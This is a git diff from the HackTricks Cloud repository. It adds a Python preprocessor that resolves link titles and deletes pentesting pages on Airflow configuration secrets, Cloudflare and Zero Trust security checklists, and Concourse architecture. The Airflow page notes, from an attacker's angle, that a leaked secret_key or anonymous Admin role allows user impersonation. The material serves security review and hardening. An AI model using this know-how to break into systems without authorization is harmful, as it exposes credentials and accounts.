if isinstance(obj, list): + for k, v in enumerate(obj): + item = findtitle(search, v, key, (*path, k)) + if item is not None: + return item + if isinstance(obj, dict): + for k, v in obj.items(): + item = findtitle(search, v, key, (*path, k)) + if item is not None: + return item + + +def ref(matchobj): + logger.debug(f'Match: {matchobj.groups(0)[0].strip()}') + href = matchobj.groups(0)[0].strip() + title = href + if href.startswith("http://") or href.startswith("https://"): + # pass + try: + raw_html = str(urlopen(Request(href, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'})).read()) + match = re.search('(.*?)', raw_html) + title = match.group(1) if match else href + except Exception as e: + logger.debug(f'Error opening URL {href}: {e}') + pass #nDont stop on broken link + else: + try: + if href.endswith("/"): + href = href+"README.md" # Fix if ref points to a folder + chapter, _path = findtitle(href, book, "source_path") + logger.debug(f'Recursive title search result: {chapter['name']}') + title = chapter['name'] + except Exception as e: + try: + dir = path.dirname(current_chapter['source_path']) + logger.debug(f'Error getting chapter title: {href} trying with relative path {path.normpath(path.join(dir,href))}') + chapter, _path = findtitle(path.normpath(path.join(dir,href)), book, "source_path") + logger.debug(f'Recursive title search result: {chapter['name']}') + title = chapter['name'] + except Exception as e: + logger.debug(f'Error getting chapter title: {path.normpath(path.join(dir,href))}') + print(f'Error getting chapter title: {path.normpath(path.join(dir,href))}') + sys.exit(1) + + + template = f"""{title}""" + + # translate_table = str.maketrans({"\"":"\\\"","\n":"\\n"}) + # translated_text = template.translate(translate_table) + result = template + + return result + + +def iterate_chapters(sections): + if isinstance(sections, dict) and "PartTitle" in sections: # Not a chapter section + return + elif isinstance(sections, dict) and "Chapter" in sections: # Is a chapter return it and look into sub items + # logger.debug(f"Chapter {sections['Chapter']}") + yield sections['Chapter'] + yield from iterate_chapters(sections['Chapter']["sub_items"]) + elif isinstance(sections, list): # Iterate through list when in sections and in sub_items + for k, v in enumerate(sections): + yield from iterate_chapters(v) + + +if __name__ == '__main__': + global context, book, current_chapter + if len(sys.argv) > 1: # we check if we received any argument + if sys.argv[1] == "supports": + # then we are good to return an exit status code of 0, since the other argument will just be the renderer's name + sys.exit(0) + logger.debug('Started hacktricks preprocessor') + # load both the context and the book representations from stdin + context, book = json.load(sys.stdin) + + logger.debug(f"Context: {context}") + + + for chapter in iterate_chapters(book['sections']): + logger.debug(f"Chapter: {chapter['path']}") + current_chapter = chapter + regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}' + new_content = re.sub(regex, ref, chapter['content']) + chapter['content'] = new_content + + content = json.dumps(book) + logger.debug(content) + + + print(content) \ No newline at end of file diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md deleted file mode 100644 index 2508f970f..000000000 --- a/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md +++ /dev/null @@ -1,137 +0,0 @@ -# Airflow Configuration - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Configuration File - -**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** - -**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** - -Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. - -If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ -If you have **access to some machine inside the airflow env**, check the **environment**. - -Some interesting values to check when reading the config file: - -### \[api] - -* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** -* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** -* **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: - * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API - * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication - * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** - * `airflow.api.auth.backend.basic_auth`: For **basic authentication** - * `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). - * `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). - * You can also **create you own authentication** method with python. -* **`google_key_path`:** Path to the **GCP service account key** - -### **\[atlas]** - -* **`password`**: Atlas password -* **`username`**: Atlas username - -### \[celery] - -* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) -* **`result_backend`**: Postgres url which may contain **credentials**. -* **`ssl_cacert`**: Path to the cacert -* **`ssl_cert`**: Path to the cert -* **`ssl_key`**: Path to the key - -### \[core] - -* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. -* **`fernet_key`**: Key to store encrypted variables (symmetric) -* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. -* **`security`**: What security module to use (for example kerberos) - -### \[dask] - -* **`tls_ca`**: Path to ca -* **`tls_cert`**: Part to the cert -* **`tls_key`**: Part to the tls key - -### \[kerberos] - -* **`ccache`**: Path to ccache file -* **`forwardable`**: Enabled by default - -### \[logging] - -* **`google_key_path`**: Path to GCP JSON creds. - -### \[secrets] - -* **`backend`**: Full class name of secrets backend to enable -* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. - -### \[smtp] - -* **`smtp_password`**: SMTP password -* **`smtp_user`**: SMTP user - -### \[webserver] - -* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value -* **`cookie_secure`**: Set **secure flag** on the the session cookie -* **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** -* **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) -* **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) -* **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** -* **`web_server_ssl_key`**: **Path** to the **SSL** **Key** -* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible - -### Web Authentication - -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as - -```bash -AUTH_TYPE = AUTH_DB -``` - -Which means that the **authentication is checked against the database**. However, other configurations are possible like - -```bash -AUTH_TYPE = AUTH_OAUTH -``` - -To leave the **authentication to third party services**. - -However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: - -```bash -AUTH_ROLE_PUBLIC = 'Admin' -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/README.md b/pentesting-ci-cd/cloudflare-security/README.md deleted file mode 100644 index 05741968d..000000000 --- a/pentesting-ci-cd/cloudflare-security/README.md +++ /dev/null @@ -1,163 +0,0 @@ -# Cloudflare Security - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -## Websites - -Review each with: - -{% content-ref url="cloudflare-domains.md" %} -[cloudflare-domains.md](cloudflare-domains.md) -{% endcontent-ref %} - -### Domain Registration - -* [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. - -Review each with: - -{% content-ref url="cloudflare-domains.md" %} -[cloudflare-domains.md](cloudflare-domains.md) -{% endcontent-ref %} - -## Analytics - -_I couldn't find anything to check for a config security review._ - -## Pages - -On each Cloudflare's page: - -* [ ] Check for **sensitive information** in the **`Build log`**. -* [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. -* [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). -* [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). -* [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** -* [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. -* [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. - -## **Workers** - -On each Cloudflare's worker check: - -* [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? -* [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** -* [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) - * Check for SSRFs returning the indicated page that you can control - * Check XSSs executing JS inside a svg image - * It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. - -{% hint style="warning" %} -Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. -{% endhint %} - -## R2 - -On each R2 bucket check: - -* [ ] Configure **CORS Policy**. - -## Stream - -TODO - -## Images - -TODO - -## Security Center - -* [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. - * [ ] Just **check this information** for security misconfigurations and interesting info - -## Turnstile - -TODO - -## **Zero Trust** - -{% content-ref url="cloudflare-zero-trust-network.md" %} -[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md) -{% endcontent-ref %} - -## Bulk Redirects - -{% hint style="info" %} -Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. -{% endhint %} - -* [ ] Check that the **expressions** and **requirements** for redirects **make sense**. -* [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. - -## Notifications - -* [ ] Check the **notifications.** These notifications are recommended for security: - * `Usage Based Billing` - * `HTTP DDoS Attack Alert` - * `Layer 3/4 DDoS Attack Alert` - * `Advanced HTTP DDoS Attack Alert` - * `Advanced Layer 3/4 DDoS Attack Alert` - * `Flow-based Monitoring: Volumetric Attack` - * `Route Leak Detection Alert` - * `Access mTLS Certificate Expiration Alert` - * `SSL for SaaS Custom Hostnames Alert` - * `Universal SSL Alert` - * `Script Monitor New Code Change Detection Alert` - * `Script Monitor New Domain Alert` - * `Script Monitor New Malicious Domain Alert` - * `Script Monitor New Malicious Script Alert` - * `Script Monitor New Malicious URL Alert` - * `Script Monitor New Scripts Alert` - * `Script Monitor New Script Exceeds Max URL Length Alert` - * `Advanced Security Events Alert` - * `Security Events Alert` -* [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS** - * [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** - -## Manage Account - -* [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. -* [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. -* [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. - * Therefore, whenever possible is **recommended** to use the **Enterprise plan**. -* [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. - -{% hint style="info" %} -Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) -{% endhint %} - -## DDoS Investigation - -[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md deleted file mode 100644 index 7eb00f0ba..000000000 --- a/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md +++ /dev/null @@ -1,159 +0,0 @@ -# Cloudflare Domains - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -### Overview - -* [ ] Get a feeling of **how much** are the services of the account **used** -* [ ] Find also the **zone ID** and the **account ID** - -### Analytics - -* [ ] In **`Security`** check if there is any **Rate limiting** - -### DNS - -* [ ] Check **interesting** (sensitive?) data in DNS **records** -* [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) -* [ ] Check for web pages that **aren't** **proxied** -* [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address -* [ ] Check that **DNSSEC** is **enabled** -* [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** - * This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings -* [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) - -### **Email** - -TODO - -### Spectrum - -TODO - -### SSL/TLS - -#### **Overview** - -* [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. -* [ ] The **SSL/TLS Recommender** should be enabled - -#### Edge Certificates - -* [ ] **Always Use HTTPS** should be **enabled** -* [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** -* [ ] **Minimum TLS Version should be 1.2** -* [ ] **TLS 1.3 should be enabled** -* [ ] **Automatic HTTPS Rewrites** should be **enabled** -* [ ] **Certificate Transparency Monitoring** should be **enabled** - -### **Security** - -* [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. - * The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. -* [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used -* [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare -* [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** -* [ ] In the **`Settings`** section: - * [ ] Check that the **`Security Level`** is **medium** or greater - * [ ] Check that the **`Challenge Passage`** is 1 hour at max - * [ ] Check that the **`Browser Integrity Check`** is **enabled** - * [ ] Check that the **`Privacy Pass Support`** is **enabled** - -#### **CloudFlare DDoS Protection** - -* If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. -* In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. - * If the attack is from a **verified bot**, at least **add a rate limit** to bots. - * If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. - * You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. - * Check if **Managed rules** could also help to prevent vulnerability exploitations. - * In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** -* In DDoS you could **override some rules to make them more restrictive**. -* **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. -* In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled -* In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** - -### Access - -{% content-ref url="cloudflare-zero-trust-network.md" %} -[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md) -{% endcontent-ref %} - -### Speed - -_I couldn't find any option related to security_ - -### Caching - -* [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** - -### **Workers Routes** - -_You should have already checked_ [_cloudflare workers_](./#workers) - -### Rules - -TODO - -### Network - -* [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** -* [ ] **`HTTP/3 (with QUIC)`** should be **enabled** -* [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** - -### **Traffic** - -TODO - -### Custom Pages - -* [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) - -### Apps - -TODO - -### Scrape Shield - -* [ ] Check **Email Address Obfuscation** is **enabled** -* [ ] Check **Server-side Excludes** is **enabled** - -### **Zaraz** - -TODO - -### **Web3** - -TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md deleted file mode 100644 index 85b037522..000000000 --- a/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md +++ /dev/null @@ -1,87 +0,0 @@ -# Cloudflare Zero Trust Network - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -### Analytics - -* [ ] Useful to **get to know the environment** - -### **Gateway** - -* [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. - * If used, **policies** could be created to **restrict** the access to malicious sites. - * This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. - -### Access - -#### Applications - -On each application: - -* [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. - * To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) -* [ ] Check the **available identity providers** and make sure they **aren't too open** -* [ ] In **`Settings`**: - * [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) - * [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. - * [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** - -#### **Access Groups** - -* [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. -* [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. - * Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. - -#### Service Auth - -* [ ] Check that all service tokens **expires in 1 year or less** - -#### Tunnels - -TODO - -### My Team - -TODO - -### Logs - -* [ ] You could search for **unexpected actions** from users - -### Settings - -* [ ] Check the **plan type** -* [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** -* [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/concourse-security/README.md b/pentesting-ci-cd/concourse-security/README.md deleted file mode 100644 index bc438e1de..000000000 --- a/pentesting-ci-cd/concourse-security/README.md +++ /dev/null @@ -1,59 +0,0 @@ -# Concourse Security - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...) - -## Concourse Architecture - -Learn how the concourse environment is structured in: - -{% content-ref url="concourse-architecture.md" %} -[concourse-architecture.md](concourse-architecture.md) -{% endcontent-ref %} - -## Concourse Lab - -Learn how you can run a concourse environment locally to do your own tests in: - -{% content-ref url="concourse-lab-creation.md" %} -[concourse-lab-creation.md](concourse-lab-creation.md) -{% endcontent-ref %} - -## Enumerate & Attack Concourse - -Learn how you can enumerate the concourse environment and abuse it in: - -{% content-ref url="concourse-enumeration-and-attacks.md" %} -[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/concourse-security/concourse-architecture.md b/pentesting-ci-cd/concourse-security/concourse-architecture.md deleted file mode 100644 index c2a08a80f..000000000 --- a/pentesting-ci-cd/concourse-security/concourse-architecture.md +++ /dev/null @@ -1,64 +0,0 @@ -# Concourse Architecture - -## Concourse Architecture - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) - -### Architecture - -![](<../../.gitbook/assets/image (187).png>) - -#### ATC: web UI & build scheduler - -The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). - -The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. - -#### TSA: worker registration & forwarding - -The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). - -The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. - -The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). - -#### Workers - -In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). - -* **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. -* **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. - -## References - -* [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
